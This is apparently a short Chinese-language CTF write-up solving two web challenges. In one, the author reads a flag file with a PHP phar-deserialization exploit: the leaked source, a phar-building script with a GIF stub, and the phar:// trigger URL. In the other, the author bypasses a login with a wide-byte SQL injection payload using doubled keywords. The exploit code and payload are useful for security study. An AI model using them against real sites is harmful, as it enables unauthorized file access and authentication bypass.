白天上班,晚上看下题目。如果能做出来就写下wp
5_web_BaliYun
一开始尝试上传,发现不行
扫描目录得到www.zip
获得源码
<?php
class upload{
public $filename;
public $ext;
public $size;
public $Valid_ext;
public function __construct(){
$this->filename = $_FILES["file"]["name"];
$this->ext = end(explode(".", $_FILES["file"]["name"]));
$this->size = $_FILES["file"]["size"] / 1024;
$this->Valid_ext = array("gif", "jpeg", "jpg", "png");
}
public function start(){
return $this->check();
}
private function check(){
if(file_exists($this->filename)){
return "Image already exsists";
}elseif(!in_array($this->ext, $this->Valid_ext)){
return "Only Image Can Be Uploaded";
}else{
return $this->move();
}
}
private function move(){
move_uploaded_file($_FILES["file"]["tmp_name"], "upload/".$this->filename);
return "Upload succsess!";
}
public function __wakeup(){
echo file_get_contents($this->filename);
}
}
class check_img{
public $img_name;
public function __construct(){
$this->img_name = $_GET['img_name'];
}
public function img_check(){
if(file_exists($this->img_name)){
return "Image exsists";
}else{
return "Image not exsists";
}
}
}
输入?img_name=/flag 发现文件存在
上传一个phar文件即可
$o = new check_img;
$cl2=new upload;
$cl2->filename="/flag";
$o->img_name=$cl2;
echo serialize($o);
$filename = 'poc.phar';// 后缀必须为phar,否则程序无法运行
file_exists($filename) ? unlink($filename) : null;
$phar=new Phar($filename);
$phar->startBuffering();
$phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($o);
$phar->addFromString("foo.txt","bar");//添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
?img_name=phar://upload/poc.gif
做完后发现这里饶了个弯,直接new upload就可以
5_easylogin
暴破没有结果
发现是宽字节sql注入 payload:
username=admin%df’ununionion//seselectlect//1,0x61646d696e,0x3063633137356239633066316236613833316333393965323639373732363631%23&password=a